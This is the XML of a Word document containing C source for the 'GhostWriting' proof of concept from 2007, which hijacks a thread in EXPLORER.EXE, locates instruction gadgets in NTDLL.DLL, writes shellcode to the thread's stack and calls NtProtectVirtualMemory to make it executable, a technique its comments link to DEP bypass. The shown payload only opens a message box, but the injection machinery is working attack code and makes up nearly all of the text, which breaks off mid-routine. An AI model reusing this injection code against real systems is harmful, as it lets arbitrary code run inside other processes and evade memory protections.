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B14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//////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B06BE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Proof Of Concept for GhostWriting technique by c0de90e7.    Spring '2007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F27643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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C64C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F2F53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3BB53CE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#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE5D8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D870EA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HWND STDCALL GetShellWindow(void);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A449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935E43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Machine code bytes that we will inject into EXPLORER.EXE. When this snippet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0380F4E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gets executed, it will launch a MessageBox and then return to the address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F795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indicated in ESI register. ESI will point to a EBFE ( JMP $ ) found into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1DCB8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NTDLL.DLL, so the hijacked thread will enter an auto-lock state after the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515CF3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user clicks OK in this MessageBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC1ED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UCHAR InjectionCode[]={</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x6A,0x00,</w:t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PUSH 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8FDF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0xE8,0x0D,0x00,0x00,0x00,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>// CALL NEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33EC5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Caption text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE5F8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'G','h','o','s','t','W','r','i','t','i','n','g',0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3B86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0xE8,0x1D,0x00,0x00,0x00,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>// CALL NEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE612B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Message text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51690BB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'R','u','n','n','i','n','g',' ','i','n','t','o',' ','E','X','P','L','O','R','E','R','.','E','X','E','.','.','.',0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F424E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0x6A,0x00,</w:t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PUSH 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4238AA8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0x56,</w:t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PUSH ESI</w:t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; ( return address where MessageBoxA should return, we will set ESI so that in points to a EBFE )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3CE0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0x68,0x00,0x00,0x00,0x00,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>// PUSH MessageBoxA</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>; ( we will change those 00s to MessageBoxA address in runtime )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32834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0xC3 };</w:t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RET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E249B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E333AB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This routine will set thread's context to the values we want and wait till</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E613A2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thread's EIP reaches a point we indicate. For this proof of concept, we</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6300CDA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will also post some GUI messages to the hijacked thread, so that thread's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF21B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>// common "wait for messages" nature doesn't slow things down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D485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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D09C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void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DA90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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE979A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SetThreadContext(Thread,PThreadContext);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED0A4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EAF52D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PostMessage(ThreadsWindow,WM_USER,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A5CF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PostMessage(ThreadsWindow,WM_USER,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D85E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PostMessage(ThreadsWindow,WM_USER,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D262F9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CFD147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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407EEA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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C590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ResumeThread(Thread);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CF8CB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Sleep(30);    // This could also be Sleep(0) ( Yield, as NtYieldExecution would do ), but in some cases ( windows server versions ) this would</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09567DB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lead to slowdowns or even starvation of the hijacked thread's execution. I have not done further research into this matter, but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562257A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I think this is due to the fact that those server versions of windows prioritize non-GUI thread's execution over GUI thread's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8AABD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execution by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F02E9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2137AFD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SuspendThread(Thread);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060CCC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GetThreadContext(Thread,PThreadContext);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CBEB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C626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while(PThreadContext-&gt;Eip!=AutoLockTargetEIP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71678B3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54A49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463BB03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This routine will disassemble a possible "MOV [REG1],REG2" or "MOV [REG1+xx],REG2" instruction and validate its REG1 and REG2 registers so that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE4FD8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 a) They are EBX, EBP, ESI or EDI. We need them to be one of those, since they are the only stable ones when it comes to setting thread's context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE4CE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 b) They are not the same ( REG1!=REG2 ). We need them to be different because we will use REG1 to point to memory and REG2 to write a DWORD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14390A5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D9B7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int DisassembleAndValidateMOV(PUCHAR InstructionMemoryBase,ULONG* InstructionMemoryIndex,CONTEXT* PThreadContextBase,DWORD** WritePointer,DWORD** WriteItem,int* MOVRETOffsetFromMemoryRegister)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B512BF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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410B4E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UCHAR WritePointerRegIndex,WriteItemRegIndex,ModRM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF95D7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DWORD* ArrayOfValidRegisterAddressesInContext[8];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83334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05352E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  <w:t>// Valid register addresses ( non-volatile ones ). NOTE, ESP is not volatile, but we will not be using it either.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1656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ArrayOfValidRegisterAddressesInContext[0]=NULL;    // EAX, not valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BB09C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ArrayOfValidRegisterAddressesInContext[1]=NULL;    // ECX, not valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237446A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ArrayOfValidRegisterAddressesInContext[2]=NULL;    // EDX, not valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC769A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ArrayOfValidRegisterAddressesInContext[3]=&amp;PThreadContextBase-&gt;Ebx;    // EBX, valid, non-volatile, stable for setting it with SetThreadContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032C341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ArrayOfValidRegisterAddressesInContext[4]=NULL;    // ESP, valid, but we will not use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6E75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ArrayOfValidRegisterAddressesInContext[5]=&amp;PThreadContextBase-&gt;Ebp;    // EBX, valid, non-volatile, stable for setting it with SetThreadContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76BD8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ArrayOfValidRegisterAddressesInContext[6]=&amp;PThreadContextBase-&gt;Esi;    // ESI, valid, non-volatile, stable for setting it with SetThreadContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3252576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ArrayOfValidRegisterAddressesInContext[7]=&amp;PThreadContextBase-&gt;Edi;    // EDI, valid, non-volatile, stable for setting it with SetThreadContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF02FC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866074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if(InstructionMemoryBase[*InstructionMemoryIndex]==0x89)    // Is it a "MOV /r" instruction ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32707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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03120D4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ModRM=InstructionMemoryBase[*InstructionMemoryIndex+1];    // if it is, we pick next byte, ModRM. We will split it into Mod,dstRM,srcRM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66943A8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F962FC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if((ModRM&amp;0x80)!=0)    // We need Mod field to be 00 or 01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB4A56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return FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70399F9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DACD29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WritePointerRegIndex=ModRM&amp;0x07;    // We pick dstRM ( destination register ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A17465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WriteItemRegIndex=(ModRM&gt;&gt;3)&amp;0x07;    // We pick srcRM ( source register ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F34C7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5C8E2D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if(WritePointerRegIndex==WriteItemRegIndex)    // condition "b)", we need source and destination registers to be different REG1!=REG2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3571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return FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79216A1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1EFF8E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if((ModRM&amp;0x40)==0)    // if Mod field is 00, it is a "MOV [REG1],REG2" instruction. Otherwise, if it is 01, it is a "MOV [REG1+xx],REG2".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C9C3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    // Mod == 00    =&gt;    "MOV [REG1],REG2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507101A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if(WritePointerRegIndex==5)    // This is a sub-case of "MOV [REG1],REG2" that has to be discarded. When Mod is 00 and destination RM is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A500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return FALSE;            // 5 ( the value that would indicate EBP ), the instruction is not "MOV [EBP],REG2", it turns out to be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BD9C0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"MOV [immediate32],REG2" instead. That immediate32 is a 32 bit address that gets encoded just after</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618615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this ModRM byte ( 89 RM YY YY YY YY, or 89, ModRM byte, immediate32 DWORD ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105AE61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0A394BD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*MOVRETOffsetFromMemoryRegister=0;    // See Inject routine. This variable will hold the displacement over REG1 register. Since this is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531EF78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is the case of a "MOV [REG1],REG2", there is no displacement over REG1, so we set it to 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BDFD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0984D5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*InstructionMemoryIndex+=2;    // We increment the instruction memory index by 2, because that's the size of this instruction ( 89 RM ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDB1E6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7A2B1B2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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BCB18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    // Mod == 01    =&gt;    "MOV [REG1+xx],REG2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3818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*MOVRETOffsetFromMemoryRegister=(signed char)InstructionMemoryBase[*InstructionMemoryIndex+2];    // In this case, that "xx" of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BBF63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instruction is a byte and gets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0CF2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encoded just after the ModRM byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78EA9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( 89 RM xx ). So we pick it from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CC2BE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instruction memory and set it to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDD5C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this variable as a sign extended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBDF87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byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF3007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NOTE: MOVRETOffsetFromMemoryRegister</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66D23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is a 32 bit integer while this "xx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C60B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found in the instruction is a 8 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04378F0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integer, thats why we sign extend it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627594C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by that cast, otherwise, it would not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA068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work properly in negative "xx" cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38B67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0BCDC2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*InstructionMemoryIndex+=3;    // As we have seen, the encoding of this case takes 3 bytes ( 89 RM xx ), so we increment instruction memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3855C33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index by 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2EFE0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1ED445B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083119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If the picked registers are valid ( not NULL ), we set them to WritePointer and WriteItem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F458ED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if ((ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex]!=NULL)&amp;&amp;(ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex]!=NULL))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A868E0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704536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*WritePointer=ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C015A1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*WriteItem=ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEAB20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58BC5F7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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA6C5B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return FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC293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1C6091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return TRUE;    // If we reach this point, all the needed requirements have been met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755840C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8EDD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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32889D0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return FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD0C8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD681F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344C24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This is the core routine of this PoC. It will hijack a thread, inject code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE576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to it's stack ( although it could be anywhere... ) and finally run that code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB6E3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afterwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A51355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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387804E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NOTE: This function gets hijacked thread's handle, a pointer and a size of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60D18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the code we want and what may seem lees obvious, a window handle owned by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053306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the hijacked thread. We will use that handle to call WaitForThreadAutoLock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42751C7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 ( see WaitForThreadAutoLock ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1BF8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//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC42C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int Inject(HANDLE Thread,DWORD* InjectionCode,ULONG NumberOfDWORDsToInject,HWND ThreadsWindow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198BA03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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F485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CONTEXT SavedThreadContext;    // This will hold the initial hijacked thread's register state, so that we can resume thread's execution in its</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6CE9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original state after we have finished our injection task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC0CF1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35D5D42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CONTEXT WorkingThreadContext;    // This one will hold hijacked thread's state while the thread is hijacked. We will do Get/SetThreadContexts as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739202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many times as needed, that's what this technique is all about...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594652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8F90D8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DWORD* WritePointer;    // This two pointers will point into some fields into WorkingThreadContext in order to abstract the registers used in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058848F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  <w:t>DWORD* WriteItem;        // "MOV [REG1],REG2" instruction that the hijacked thread will be executing. See DisassembleAndValidateMOV routine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863CE4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07ED232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DWORD JMPTOSELFAddress,MOVRETAddress;    // This two are the addresses of a EBFE ( JMP $ ) and a "MOV [REG1],REG2"+"RET" respectively. We will find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A733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them into NTDLL.DLL's code sections ( it could be into any module or even other places... ) and we will</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D231D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divert hijacked thread's execution to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CDBA9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4A7B743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int MOVRETOffsetFromMemoryRegister;    // See DisassembleAndValidateMOV, this variable holds the displacement over REG1 register found in instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26418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"MOV [REG1],REG2" or "MOV [REG1+xx],REG2". If we find a "MOV [REG1],REG2", then this variable will be set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAC2F2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to 0, otherwise, if we find a  "MOV [REG1+xx],REG2", this variable will be set to that "xx" value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98FE7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4766461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ULONG NumberOfBytesToPopAfterMOVBeforeRET;    // We will look for a pattern like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C933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MOV [REG1],REG2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C76B4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RET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C8B7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But in order to be more flexible, since this pattern is not very common, we will also accept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3039C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patterns like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25CC2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MOV [REG1],REG2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414EE5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POP REGx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208967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POP REGx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8012D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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EA46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RET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D50FE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This pattern is far more common, it is indeed very common as function's epilogue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF012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So, in order to support working with this pattern, we need to control the amount of stack balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B396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that will take place after that "MOV [REG1],REG2" and before that "RET". We will count the number of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385621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POP instructions between the MOV and the RET and we will also accept "ADD REG,yy" instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11892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( which are very common instructions also ), and check if that REG is ESP, taking that "yy" into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC7E48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account if that's the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597DC6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DEF137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DWORD BASEOfWrittenBytes,DWORDWritingPointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA90F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31288B0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DWORD InjectedCodeExecutionStart;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B698A7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AF0EC2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  <w:t>DWORD NtProtectVirtualMemoryAddress;    // This will hold the address of NtProtectVirtualMemory API into NTDLL.DLL. We will divert hijacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0DC4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thread's execution flow to that API in the last step of the injection, before actually executing the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130560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injected code. The purpose of this step ( see next array also ) is to make our injected code bytes that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661458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have been stored into hijacked thread's stack be PAGE_EXECUTE_READWRITE. By setting thread's EIP to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB41C1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NtProtectVirtualMemory API and setting thread's ESP to a copy of NtProtectVirtualMemoryCallFrame ( that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A74B7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we will also inject to the hijacked thread's stack ), we will simulate a call as if the hijacked thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107FB2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itself did the call. This is based on common anti-DEP techniques theory used in some buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A49C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exploitation for DEP enabled machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E207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499FD9F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DWORD NtProtectVirtualMemoryCallFrame[1+5+3]=    {    0,                        // return address that will point to JMPTOSELF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479615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0F9868E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0xFFFFFFFF,             // (pseudo)handle of current process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD2A0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0,                      // pointer that will point to base address of memory region (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F422CA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0,                      // pointer that will point to size of memory region (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B7E1E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PAGE_EXECUTE_READWRITE,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>// protection flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11622F9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0,                      // pointer that will point to a DWORD where original protection flags will be stored (3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8711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AA6A8B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0,                      // [1] base address of the memory region where the protection flags are to be changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4356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0,                      // [2] size of the memory region where the protection flags are to be changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A1629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0    };                 // [3] DWORD to get original protection flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E513C1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D7A048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HMODULE NTDLLBase;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CC3A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PUCHAR NTDLLCode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB9B27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PIMAGE_NT_HEADERS NTDLLPEHeader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58000A7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ULONG NTDLLCodeSize,i,j,k;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149E80E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FC2DEB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  <w:t>NTDLLBase=GetModuleHandle("NTDLL.DLL");    // We get NTDLL.DLLs module base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6644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NtProtectVirtualMemoryAddress=(DWORD)GetProcAddress(NTDLLBase,"NtProtectVirtualMemory");    // We solve NtProtectVirtualMemory API address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA0C25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084B79D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NTDLLCode=(PUCHAR)((ULONG)NTDLLBase+0x00001000);    // Assume first section starts at Base+1000h, and assume it is a code section...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CF8F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0538758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NTDLLPEHeader=(PIMAGE_NT_HEADERS)((ULONG)NTDLLBase+((IMAGE_DOS_HEADER*)NTDLLBase)-&gt;e_lfanew);    // We get total code size ( of all the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620256D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NTDLLCodeSize=NTDLLPEHeader-&gt;OptionalHeader.SizeOfCode;                                            // sections in NTDLL.DLL ). We also assume those</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9A3C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code sections are all contiguous...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C31C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4B2E732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JMPTOSELFAddress=MOVRETAddress=(DWORD)NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5003E95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411CAB5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i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5190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06FE93F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while((i&lt;NTDLLCodeSize)&amp;&amp;((!JMPTOSELFAddress)||(!MOVRETAddress)))    // While there is still machine code to look at and we have not found our</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E28F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{                                                                    // two needed patterns ( "JMP $" and "MOV [REG1],REG2"+"RET" ), keep searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6703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if(!JMPTOSELFAddress)    // If we still have not found a "JMP $"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B916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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46B2D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if((NTDLLCode[i]==0xEB)&amp;&amp;(NTDLLCode[i+1]==0xFE))    // check if we have that "JMP $" machine code at this point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55482E2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1EBF7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JMPTOSELFAddress=(DWORD)&amp;NTDLLCode[i];    // If we found it, store the address for later usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5294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i+=1;    // and increment searching index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C6C5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39453B9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300CF98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CCDCE2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if(!MOVRETAddress)    // If we still have not found a "MOV [REG1],REG2"+"RET"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A1EF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    // check if it is a "MOV [REG1],REG2" or "MOV [REG1+xx],REG2". See DisassembleAndValidateMOV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48327BC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if(DisassembleAndValidateMOV(NTDLLCode,&amp;i,&amp;WorkingThreadContext,&amp;WritePointer,&amp;WriteItem,&amp;MOVRETOffsetFromMemoryRegister))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3C5A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    // If the instruction was a valid ( see requirements criteria on DisassembleAndValidateMOV comments ) one,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883812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we have i pointing to the next opcode bytes after that MOV, WritePointer and WriteItem pointing to the correct register fields into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD651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WorkingThreadContext and MOVRETOffsetFromMemoryRegister set to the "xx" value in case the MOV instructions was "MOV [REG1+xx],REG2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C139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328B22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j=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47F07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k=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFEA3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628ADD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while(j&lt;i+16)    // in a 16 byte range after that MOV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2395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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DD06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if(((NTDLLCode[j]&amp;0xF8)==0x58)&amp;&amp;(NTDLLCode[j]!=0x5C))    // we look for POP REGx instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0386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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370005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k+=4;    // if that's the case, we increment ESP balancing counter for later calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8C87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j+=1;    // We increment this sub-search index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE668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continue;    // and we continue with a new instruction byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70FE5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2BDA6EF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5E0541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 ((NTDLLCode[j]==0x83)&amp;&amp;((NTDLLCode[j+1]&amp;0xF8)==0xC0))    // we look for ADD REGx,yy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A061BE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769D71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if(NTDLLCode[j+1]==0xC4)    // if that REGx is ESP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C991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k+=(signed char)NTDLLCode[j+2];    // we add yy amount of bytes to ESP balancing counter for later use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38FE9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448C93E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j+=3;    // We increment this sub-search index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601371C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continue;    // and we continue with a new instruction byte</w:t>
      </w:r>
    </w:p>
